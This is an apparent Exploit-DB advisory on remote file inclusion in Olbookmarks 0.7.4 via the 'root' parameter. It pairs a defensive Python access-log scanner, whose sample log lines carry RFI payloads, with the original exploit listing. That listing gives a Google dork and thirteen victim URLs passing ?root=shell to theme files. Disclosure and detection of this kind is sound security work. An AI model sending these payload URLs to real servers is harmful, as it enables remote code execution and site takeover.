Vendor: Olbookmarks
By: ThE TiGeR
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Olbookmarks
Affected Version From: Olbookmarks 0.7.4
Affected Version To: Olbookmarks 0.7.4
Patch Exists: NO
2007

Olbookmarks 0.7.4 multiple RFI (root)

Olbookmarks 0.7.4 is vulnerable to multiple Remote File Inclusion (RFI) attacks. An attacker can exploit these vulnerabilities by injecting malicious code via the 'root' parameter of various PHP files.

Mitigation:

Update to a patched version of Olbookmarks or apply appropriate security measures to prevent RFI attacks.
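
A log check for the pattern described above, added here as an example and not part of the original advisory: it scans web-server access logs for direct requests to theme PHP files that carry a 'root' query parameter. The log lines are constructed, and it is an assumption that theme files are never legitimately requested with 'root' in the query string.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (common log format); IPs and hosts are placeholders.
SAMPLE_LOG = r'''
198.51.100.7 - - [21/May/2007:10:01:02 +0000] "GET /olbookmarks-0.7.4/index.php HTTP/1.1" 200 5120
198.51.100.7 - - [21/May/2007:10:01:09 +0000] "GET /olbookmarks-0.7.4/themes/test1.php?root=http://files.example/x.txt? HTTP/1.1" 200 312
203.0.113.9 - - [21/May/2007:10:03:11 +0000] "GET /path/theme/frames1.php?root=hTTp%3A%2F%2Ffiles.example%2Fx HTTP/1.0" 200 99
192.0.2.44 - - [21/May/2007:10:04:00 +0000] "GET /path/themes/blackorange.php?root=shell HTTP/1.1" 200 140
192.0.2.44 - - [21/May/2007:10:04:05 +0000] "GET /docs/page.php?root=http://files.example/x HTTP/1.1" 404 12
192.0.2.44 - - [21/May/2007:10:04:09 +0000] "GET /path/theme/default.php HTTP/1.1" 200 77
'''

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Assumption: the affected files sit directly under a theme/ or themes/ directory.
THEME_PATH_RE = re.compile(r'/themes?/[^/]+\.php$', re.I)
# A value that starts with a URL scheme (or //host) points outside the local tree.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]+:|//)', re.I)


def find_root_requests(log_text):
    """Return (client, path, root value, kind) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        path = unquote(url.path)
        if not THEME_PATH_RE.search(path):
            continue
        # parse_qs percent-decodes once, so encoded values are seen in decoded form.
        # Only the query string is inspected; POST bodies do not appear in access logs.
        for value in parse_qs(url.query, keep_blank_values=True).get("root", []):
            kind = "remote-url" if REMOTE_RE.match(value.strip()) else "root-supplied"
            findings.append((line.split()[0], path, value, kind))
    return findings


if __name__ == "__main__":
    for client, path, value, kind in find_root_requests(SAMPLE_LOG):
        print(f"{kind:13} {client:14} {path} root={value!r}")
```

Hits of kind "remote-url" warrant review of what the server fetched at that time; "root-supplied" hits show the parameter being set from outside on a theme file.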

Exploit-DB raw data:

#Olbookmarks =>0.7.4 multiple RFI (root)
Download script :
#D0rk : allintitle:ol'bookmarks
#Thanks Str0ke
#Exploit : http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz
#http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell
#http://victime.com/path/themes/blackorange.php?root=shell
#http://victime.com/path/theme/default.php?root=shell
#http://victime.com/path/theme/frames1.php?root=shell
#http://victime.com/path/theme/frames1_top.php?root=shell
#http://victime.com/path/theme/test1.php?root=shell
#http://victime.com/path/theme/test2.php?root=shell
#http://victime.com/path/theme/test3.php?root=shell
#http://victime.com/path/theme/test4.php?root=shell
#http://victime.com/path/theme/test5.php?root=shell
#http://victime.com/path/theme/test6.php?root=shell
#http://victime.com/path/theme/frames1_left.php?root=shell
#http://victime.com/path/theme/frames1_center.php?root=shell
#Discovered by ThE TiGeR
#Miro_Tiger[at]Hotmail[dot]com
# milw0rm.com [2007-05-21]